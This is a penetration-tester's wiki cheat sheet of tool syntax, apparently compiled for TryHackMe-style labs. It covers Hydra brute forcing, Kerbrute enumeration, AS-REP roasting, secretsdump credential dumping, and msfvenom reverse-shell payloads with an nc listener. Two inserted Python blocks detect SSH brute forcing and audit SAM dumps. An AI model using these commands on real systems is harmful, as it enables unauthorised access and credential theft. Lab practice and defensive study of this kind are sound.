====== Various Tools & Their Syntax ======

===== Apache =====

Start a simple web server in Kali:

<code>
service apache2 start
# default landing dir: /var/www/html

# To stop/kill the server:
service apache2 stop

# To check Apache status:
service apache2 status
</code>

Place files you want to transfer to the target machine in the ''/var/www/html/'' directory. Then from the target machine, access them over HTTP (browser, etc.) and download the files.

----

===== certutil =====

In Windows, use certutil from the CLI to download files (like wget in Linux):

<code>
certutil -urlcache -f http://[target ip]/filename.exe filename.exe
</code>

With the ''-f'' option, ''-urlcache'' forces fetching a specific URL and updating the cache.

Resource: [[https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil#-urlcache | documentation]]

----

===== curl =====

Download the home/index page from a site:

<code>
curl http://[target ip]
</code>

Upload a file using PUT:

<code>
curl http://[target ip]/[subdir] --upload-file gk_put.txt
# or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
</code>

**Note:** ''-X PUT'' is redundant when using ''-T'' (which is short for ''--upload-file'').

----

===== dig =====

The DNS (Domain Name System) maps domain names to IP addresses. When you plug a domain name into your browser's URI box...

  - **Local cache** is checked first for a valid mapping to an IP. TTL (measured in seconds) defines the length of time a mapping in cache is considered valid. If not found...
  - Your router sends the request to a **//recursive// DNS server** (usually your ISP or OpenDNS, etc.). If not found...
  - The recursive server passes the request to a **//root name// server.** Root name servers (13 unique IP addresses for them) keep track of the DNS servers in the next level down: top-level domain servers.
  - **//Top-Level Domain// (TLD) servers** are split up by extensions (.com, .org, .co.uk, etc.). TLD servers keep track of DNS servers one level down: authoritative name servers.
  - **//Authoritative// name servers** store DNS records for domains directly (the buck stops here). The IP mapped to the domain name you requested is sent back to you, and your browser uses it to access the website you want to go to.

This whole process is automagic with browsers, but **dig** can do all this manually (and show us the results).

**Syntax:**

<code>
dig [domain] @[dns-server-ip]
# Example:
dig google.com @1.1.1.1
</code>

----

===== GoBuster =====

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

You need a wordlist. In Kali: ''/usr/share/wordlists''

**Run GoBuster with a wordlist:**

<code>
gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]
</code>

**Flags:**

^ Flag ^ Description ^
| -e | Print the full URLs in your console |
| -u | The target URL |
| -w | Path to your wordlist |
| -U and -P | Username and Password for Basic Auth |
| -p | Proxy to use for requests |
| -c | Specify a cookie for simulating your auth |

----

===== grep =====

grep for a "string" in all the files from root (/) or whatever directory you want:

<code>
grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null
</code>

Options:

  * ''-r'' : recursive; read all files under each directory, recursively
  * ''-n'' : number; prefix each line of output with the 1-based line number within its input file
  * ''-w'' : whole words; select only those lines containing matches that form whole words
  * ''-e [pattern]'' : expression; search for all patterns given; protect the pattern with "quotes"

''2>/dev/null'' sends STDERR to the abyss instead of to the screen.

----

===== HashCat =====

A password recovery tool...
**Example Syntax:**

Three of the most important options are:

  * ''-m'' Mode: the hash type, from the table in the help file
  * ''-a'' Attack-Mode: from a smaller table in the help file
  * ''-o'' Output file (so you don't have to do a ''--show'' later)

<code>
hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m  mode for Kerberos 5, etype 23, AS-REP
# -a  straight (i.e., dictionary) attack mode; default attack mode
# -o  output file name cracked.txt
</code>

If you forget to put in the ''-o'' for an output file, you'll need to re-run the same command you used to crack the password with ''--show'' added to it.

HashCat Wiki for help: [[https://hashcat.net/wiki/ | here]].

----

===== Hydra =====

Hydra is extremely functional for brute-forcing MULTIPLE different protocols.

  * [[https://rodtrent.substack.com/p/using-kali-linux-and-hydra-for-attack | Usage & Examples]]

Specify a single username and single password to try (lower case ''l'' and ''p''):

<code>
hydra -l [user] -p [password] [target IP] [ftp | ssh | etc]
</code>

Specify lists of users and/or passwords to try (upper case ''L'' and ''P''):

<code>
hydra -L [/path/to/users.txt] -P [/path/to/passwords.txt] -vV [target IP] [ftp | ssh | etc]
</code>

**Options:**

  * ''-t 4'' : number of parallel connections per target
  * ''-l [user]'' : single username of the account we are trying to compromise
  * ''-p [password]'' : single password to try
  * ''-L [/path/to/]'' : plaintext file containing possible usernames
  * ''-P [/path/to/]'' : plaintext file containing possible passwords
  * ''-vV'' : very verbose: show the login+pass combo for each attempt
  * ''[ftp | ssh | etc]'' : sets the protocol (see "supported services" below)

Be very careful with your brute-force speed. You could crash the system or DoS it.

  * The ''-t'' (tasks) option sets the number of connections in parallel (default is 16, for reference).
  * You could set ''-t 2'' or ''-t 3'' and see if that plays nicer.
  * Hydra actually recommends ''-t 1'' through ''-t 4''.
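The defender's side of the same picture, added here as an example (not code from the page or from Hydra): every guess a Hydra ''ssh'' run makes leaves a ''Failed password'' line in sshd's log, so a small sliding-window counter over those lines is enough to flag the source. The log format, the year (syslog lines carry none) and the thresholds are assumptions; the sample lines are constructed.

```python
# Added example (not Hydra's or the page's code): spot SSH password-guessing
# bursts in sshd log lines. Log format and thresholds are assumptions.
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)

def parse_failures(lines, year=2024):
    """Yield (timestamp, user, ip) for each 'Failed password' line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:  # syslog timestamps carry no year, so one is supplied
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: (total failures, distinct users tried)} for every source
    with at least `threshold` failures inside some `window_s`-second window."""
    events = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        events[ip].append((ts, user))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over sorted timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = (len(evs), len({u for _, u in evs}))
                break
    return hits

# Constructed sample (not a real log): a 5-attempt burst from 10.0.0.5,
# one successful login and one honest typo from 10.0.0.9.
SAMPLE = [
    "Mar  3 10:15:01 bastion sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 51234 ssh2",
    "Mar  3 10:15:02 bastion sshd[2102]: Failed password for root from 10.0.0.5 port 51235 ssh2",
    "Mar  3 10:15:02 bastion sshd[2103]: Failed password for invalid user test from 10.0.0.5 port 51236 ssh2",
    "Mar  3 10:15:03 bastion sshd[2104]: Failed password for root from 10.0.0.5 port 51237 ssh2",
    "Mar  3 10:15:04 bastion sshd[2105]: Failed password for invalid user oracle from 10.0.0.5 port 51238 ssh2",
    "Mar  3 10:15:05 bastion sshd[2106]: Accepted password for alice from 10.0.0.9 port 40000 ssh2",
    "Mar  3 10:20:30 bastion sshd[2107]: Failed password for alice from 10.0.0.9 port 40001 ssh2",
]
```

Only the burst source is reported with the default threshold; a single mistyped password from another host is not.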
**SMB:**

<code>
hydra -l admin -P /usr/share/wordlists/rockyou.txt [target IP] smb
</code>

**SSH:**

<code>
hydra -l student -P rockyou.txt [ip] ssh
</code>

**MySQL:**

<code>
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt [target ip] mysql
</code>

**WebDAV (http login):**

<code>
hydra -L /.../common-users.txt -P /.../common-passwords.txt [target ip] http-get /webdav/
# http-get : indicates the protocol to be used
# /webdav/ : indicates the directory where hydra can find the authentication mechanism
</code>

**RDP:**

<code>
hydra -L users.txt -P passwords.txt [target ip] rdp -s 3333
# -s : service port (if different than the default)
</code>

**Supported services:**

  * adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird
  * **ftp[s]**
  * http[s]-{head|get|post}
  * http[s]-{get|post}-form
  * http-proxy http-proxy-urlenum
  * icq imap[s] irc
  * ldap2[s] ldap3[-{cram|digest}md5][s]
  * memcached mongodb mssql mysql nntp
  * oracle-listener oracle-sid
  * pcanywhere pcnfs pop3[s] postgres
  * radmin2 **rdp** redis rexec rlogin rpcap rsh rtsp
  * s7-300 sip **smb** smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
  * telnet[s] vmauthd vnc xmpp

----

===== Kerberos =====

Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third-party ticket authorization and stronger encryption.
  * Attack [[https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a | Cheat Sheet]]

**Attack Privilege Requirements:**

^ Kerbrute Enumeration | No domain access required |
^ Pass the Ticket | Access as a user to the domain required |
^ Kerberoasting | Access as any user required |
^ AS-REP Roasting | Access as any user required |
^ Golden Ticket | Full domain compromise (domain admin) required |
^ Silver Ticket | Service hash required |
^ Skeleton Key | Full domain compromise (domain admin) required |

==== Kerbrute ====

[[https://github.com/ropnop/kerbrute | Kerbrute]] is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

  * [[https://github.com/ropnop/kerbrute/releases/tag/v1.0.3 | Download]] the binary for your machine.
  * ''chmod 777 [binary name]'' to make it executable (''chmod +x'' is all that is actually needed).

Commands:

<code>
# to get the general help screen:
./kerbrute

# to get the help screen for a specific command:
./kerbrute [command name] -h
# specific help example:
./kerbrute userenum -h

# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt
# enumerate AD usernames example:
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt

# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt
</code>

[[https://salmonsec.com/blogs/tryhackme_attacktive_directory | Here]] are some usage examples.

===== Impacket =====

Found in Kali here: ''/usr/share/doc/python3-impacket/examples''

==== GetNPUsers.py ====

Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline.
  * [[https://wadcoms.github.io/wadcoms/Impacket-GetNPUsers/ | Explanation & Example Syntax]]

<code>
# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt
</code>

----

==== secretsdump.py ====

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials and Kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [ [[https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/ | Source]] ]

**Command:**

<code>
python3 secretsdump.py test.local/john:password123@10.10.10.1
</code>

Some how-to stuff on interpreting the output: [[https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b | here]].
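An added example (not code from the page or from Impacket): a parser for the ''user:rid:lmhash:nthash:::'' lines secretsdump writes for the SAM, reporting what an auditor checks first in such a dump: accounts with a blank password (the well-known NT hash of the empty string), accounts that still store an LM hash, and accounts sharing an NT hash and therefore a password. The sample dump is constructed; the two constant hashes are public knowledge, not secrets.

```python
# Added example (not Impacket's or the page's code): parse secretsdump SAM
# lines and flag weak entries. The sample dump below is constructed.
from typing import List, NamedTuple

# Well-known constants, not secrets: the NT hash of an empty password and the
# fixed LM field written when LM hashes are not stored.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
NO_LM = "aad3b435b51404eeaad3b435b51404ee"

class SamEntry(NamedTuple):
    user: str
    rid: int
    lm_hash: str
    nt_hash: str

def parse_line(line: str) -> SamEntry:
    """Parse one 'user:rid:lmhash:nthash:::' line."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not a SAM hash line: {line!r}")
    return SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower())

def audit(lines: List[str]) -> dict:
    """Report blank passwords, LM hashes still present, and accounts that
    share an NT hash (i.e., the same password)."""
    entries = [parse_line(l) for l in lines if l.strip() and not l.startswith("[")]
    blank = [e.user for e in entries if e.nt_hash == EMPTY_NT]
    lm_stored = [e.user for e in entries if e.lm_hash != NO_LM]
    by_nt: dict = {}
    for e in entries:
        by_nt.setdefault(e.nt_hash, []).append(e.user)
    shared = {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT}
    return {"blank": blank, "lm_stored": lm_stored, "shared": shared}

# Constructed sample: fake hashes apart from the two well-known constants.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
""".splitlines()

if __name__ == "__main__":
    for finding, who in audit(SAMPLE).items():
        print(finding, who)
```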
**Example:**

<code>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
#    |        |   |                                |
#    |        |   |                                '-- NTLM hash (for Pass-the-Hash)
#    |        |   '-- LM (LAN Manager) hash (old & deprecated)
#    |        '-- RID (Relative ID)
#    '-- username
# (colon-separated values)
</code>

----

===== msfvenom =====

To see the available payloads: ''msfvenom -l payloads'' (filter by piping to grep)

  * [[https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ | Cheat Sheet]]

First, build a payload with MSFVenom (e.g., a reverse shell payload):

<code>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[local ip] LPORT=1234 -f exe > payload.exe
msfvenom -p cmd/unix/reverse_netcat LHOST=[local ip] LPORT=4444 R
#
# -p    = payload
# LHOST = local host IP address (this is your machine's IP address)
# LPORT = local port to listen on (this is the port on your machine)
# -f    = format (of the output)
# R     = export the payload in raw format
</code>

A **staged** payload will follow this syntax (note the delimiter):

  * ''windows/x64/meterpreter/reverse_tcp''
  * ''linux/x86/meterpreter/reverse_tcp''

A **non-staged** payload will follow this syntax:

  * ''windows/x64/meterpreter_reverse_tcp''
  * ''linux/x86/meterpreter_reverse_tcp''

After that, set up a listener on your attack machine:

<code>
nc -nvlp [listening port]
</code>

Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.

----

===== net commands (Windows) =====

stuff 1

----

===== ping =====

Ping Multiple IPs -- One-Liners...

**Windows:**

<code>
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"
</code>

How it works:

  * ''FOR /L %i IN (1,1,254)'' : create a loop from 1 to 254, the range of valid host IPs in a 192.168.0.0/24 network.
  * ''DO ping -n 1 192.168.0.%i'' : follow the FOR loop with the ping command to execute on each iteration.
  * ''| FIND /i "Reply"'' : filter to display only replies (kinda hinky, might need to tweak this a bit)

Redirect output to a file with: ''> filename.txt''

**Linux:**

<code>
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done
</code>

How it works:

  * ''for ip in $(seq 1 254);'' : create a loop from 1 to 254.
  * ''do ping -c 1 192.168.1.$ip; done'' : ping the IP address, substituting the loop variable for the last octet of the address, and then end the statement.

Redirect output to a file with: ''> filename.txt''

Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html

----

===== SSH =====

==== Syntax ====

<code>
ssh [user_name]@[host]
# host can be either an IP or a domain name
# OR
ssh -i [key-file] [user_name]@[host]
</code>

The default **key name** is ''id_rsa''.

  * The private key: ''~/.ssh/id_rsa''
  * The public key: ''~/.ssh/id_rsa.pub''

**Note:** You need to ''chmod 600 id_rsa'' in order for the file to be usable in a session.

If you can obtain the ''id_rsa'' file of a target, just put it in your ''~/.ssh'' directory and ssh into the target machine. Or reference the key file with the ''-i'' switch if you put it in another directory somewhere.

==== Copy via SSH ====

**Syntax:**

<code>
scp [source] [destination]
</code>

**Examples:**

To copy a file from B to A while logged into B:

<code>
scp /path/to/file username@a:/path/to/destination
#   [source]      [destination]
</code>

To copy a file from B to A while logged into A:

<code>
scp username@b:/path/to/file /path/to/destination
#   [source]                 [destination]
</code>

----

===== tcpdump =====

**Listener:**

To listen on an interface on my local machine and see if a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?)...

<code>
tcpdump -i [interface name: eth0, tun0, etc.] ip proto \\icmp
# options such as -i go before the filter expression; the shorter filter "icmp" works as well
</code>

----